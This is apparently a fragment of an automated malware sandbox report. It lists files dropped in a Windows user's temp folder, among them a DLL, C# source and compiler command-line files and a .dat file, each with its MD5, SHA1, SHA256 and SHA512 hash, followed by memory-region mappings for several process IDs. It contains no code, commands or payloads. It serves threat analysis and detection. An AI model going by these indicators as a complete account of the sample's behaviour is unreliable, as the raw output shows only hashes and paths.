SHA5124c080f1d211aaf95d760e3dae3b6bf8c158fe998e23c3b087132321155fe5a5f4e98e15f31d0a57fdb64e69dd15453d30bdf924b2caf45977caaa5bd3ffc6046
-
C:\Users\Admin\AppData\Local\Temp\ua5jr1wv\ua5jr1wv.dllMD5
8d6b661ca8cfe06c9fb7dd5c89f5f337
SHA17206625b569cd52aaa20db542d4f4562d5f10dd6
SHA2569333166d8cea299a9e564b66d2d49f7ac7e15b5110de7163d811e922fc53090b
SHA512b62310d1c3b4f0958a923eaca99bb39da245ac9c542fcee1d163e9d3cd6767183a5056f49ab88b729d7c4741ef6c6017ebbcb6ee67d06c1aa387149973bbb453
-
C:\Users\Admin\AppData\Local\cyzfc.datMD5
16bbc967a8b6a365871a05c74a4f345b
SHA19858d5cb2a6614be3c48e33911bf9f7978b441bf
SHA256b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05
SHA51268c75c95ee27fd704088dcf381378a2cd32b396a2e405be4e4f8058cf099d88c9f22c9b9a14eaec45880a2b7ae02226f1277020470aadbc153e8dd3168711f99
-
\??\c:\Users\Admin\AppData\Local\Temp\qm4epklo\CSC7552A301EA074411BC475A8B99736BCE.TMPMD5
152282baec007a686075a13f9f7e330a
SHA1aeea85744670a678d03ee92cb5ec3f7f092ef74a
SHA256c5d5bb126b3ea7b2bb37b03deb62aa4020ba15e3f3d938cb6c888154163a68b4
SHA512f2c551f29a9c7d741eeeb654c8fa8bd11747f6fff505b5d7a124c602f7ae2fd78dce55648bd8e6cc0591fb39d85c33f5c7d4c9a8cdf8e7bfdafc9bb31f5826ee
-
\??\c:\Users\Admin\AppData\Local\Temp\qm4epklo\qm4epklo.0.csMD5
cdcb629e6587254315606a6ba3764745
SHA1d5b706ca48b7af8926926e80565148f725c75393
SHA2563c131fcda0193278274e4ae82bf8363e17fcc0d1110d486072061549e0b0db55
SHA51229f17e62d18c716445e09f10dfcae7e5eef72ce0a64a3a9bd8e30108beabe55029f4b70ed5f4926772c791e7fb688b7f2d0ff777641bd86c79421189b7a8cadc
-
\??\c:\Users\Admin\AppData\Local\Temp\qm4epklo\qm4epklo.cmdlineMD5
db65d638ba32ab4cf93bcbee25e64ba6
SHA1af567d17554440e8d57087d337a95879b9ff3f69
SHA2564869f1f6e700c4b5b0f46d0a4a8c14d1278ee08b836f2f3cb9ef06b61c2b4ade
SHA5120b5b893adc1c1d724295589fce0df028db76c49fbc5d661a8a3192153cded1d0d3fa8138bb7dc9739394e0bc7b68c006e4735bc9091c8fb623e0b7d7c1051f47
-
\??\c:\Users\Admin\AppData\Local\Temp\ua5jr1wv\CSCA4AB05B7D56441ADA22692FF7976C61F.TMPMD5
75106530adee600cd311237e606f6bd9
SHA1d8a117e1c43d3d650f3ca774aae95e33f9200ada
SHA25637f3cacfd2d21ebd885dd2e77f66c3ab0789bc207a7cc8fc6a5c00f10747568f
SHA512521d2ec49aa3b2f8a0421b5498148558944b1091cf222a64bf3a25b504584ffa6c7dc3839e12e61470a31b5ecf34697ae5699fec64bc6b228ac5a8394461dc20
-
\??\c:\Users\Admin\AppData\Local\Temp\ua5jr1wv\ua5jr1wv.0.csMD5
171a88ab4fad87acfd2e5032eb0c6113
SHA1754de0e7656c558d335710fc41cbf196d39c1a19
SHA2565473b5550a65171ee7d5977d673c97e41e9ec16fad10ec5ab8aa3b7c798577a6
SHA51287ef6ac53a00d21f2df4d81ec5956861a4b539b10f5855345aa068c0d9d971f3329477e485471eb40b9eeea59f01fd3c42c4ab2f25e71d825cbf3586be0206b8
-
\??\c:\Users\Admin\AppData\Local\Temp\ua5jr1wv\ua5jr1wv.cmdlineMD5
3d50066f6fd85df784c48a58a6b52640
SHA1b281e5737386ca8fdb3c52405ac57b57fe82b29c
SHA25648f4a3c8042f5b18f0ed5bc0117d84cb9b971e25b082bba6a02db37353fde3c4
SHA5124e78270a02da3166c4e07d8b562d530c1817e07d2e577bbe76baea83b90e2a5def7712384d61a51d39d83bc6488449e0336da1b22cc0aa9a078f9dd791efe10c
-
\Users\Admin\AppData\Local\cyzfc.datMD5
16bbc967a8b6a365871a05c74a4f345b
SHA19858d5cb2a6614be3c48e33911bf9f7978b441bf
SHA256b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05
SHA51268c75c95ee27fd704088dcf381378a2cd32b396a2e405be4e4f8058cf099d88c9f22c9b9a14eaec45880a2b7ae02226f1277020470aadbc153e8dd3168711f99
-
memory/360-20-0x0000000000000000-mapping.dmp
-
memory/648-8-0x0000000000000000-mapping.dmp
-
memory/748-4-0x000001C9746D0000-0x000001C9746D1000-memory.dmpFilesize
4KB
-
memory/748-3-0x00007FF8DA440000-0x00007FF8DAE2C000-memory.dmpFilesize
9.9MB
-
memory/748-16-0x000001C974D80000-0x000001C974D81000-memory.dmpFilesize
4KB
-
memory/748-7-0x000001C972613000-0x000001C972615000-memory.dmpFilesize
8KB
-
memory/748-2-0x0000000000000000-mapping.dmp
-
memory/748-6-0x000001C972610000-0x000001C972612000-memory.dmpFilesize
8KB
-
memory/748-24-0x000001C974D90000-0x000001C974D91000-memory.dmpFilesize
4KB
-
memory/748-5-0x000001C974DF0000-0x000001C974DF1000-memory.dmpFilesize
4KB
-
memory/748-9-0x000001C972616000-0x000001C972618000-memory.dmpFilesize
8KB
-
memory/1152-38-0x0000000000000000-mapping.dmp
-
memory/1152-37-0x0000000077A82000-0x0000000077A8200C-memory.dmpFilesize
12B
-
memory/2464-17-0x0000000000000000-mapping.dmp
-
memory/2776-12-0x0000000000000000-mapping.dmp
-
memory/3396-42-0x0000000077A82000-0x0000000077A8200C-memory.dmpFilesize
12B
-
memory/3396-43-0x0000000000000000-mapping.dmp
-
memory/3828-35-0x0000000000000000-mapping.dmp
-
memory/3828-34-0x0000000077A82000-0x0000000077A8200C-memory.dmpFilesize
12B
-
memory/3944-33-0x0000000000000000-mapping.dmp
-
memory/3960-32-0x00000216EDD00000-0x00000216EDD7E000-memory.dmpFilesize
504KB
-
memory/3960-31-0x00000216EDAD0000-0x00000216EDB10000-memory.dmpFilesize
256KB
-
memory/3960-29-0x000000006BAC0000-0x000000006BB0F000-memory.dmpFilesize
316KB
-
memory/3960-26-0x0000000000000000-mapping.dmp
-
memory/4088-25-0x0000000000000000-mapping.dmp
-
memory/4184-47-0x0000000077A82000-0x0000000077A8200C-memory.dmpFilesize
12B
-
memory/4184-48-0x0000000000000000-mapping.dmp
-
memory/4292-50-0x0000000077A82000-0x0000000077A8200C-memory.dmpFilesize
12B
-
memory/4292-51-0x0000000000000000-mapping.dmp
-
memory/4384-53-0x0000000077A82000-0x0000000077A8200C-memory.dmpFilesize
12B
-
memory/4384-54-0x0000000000000000-mapping.dmp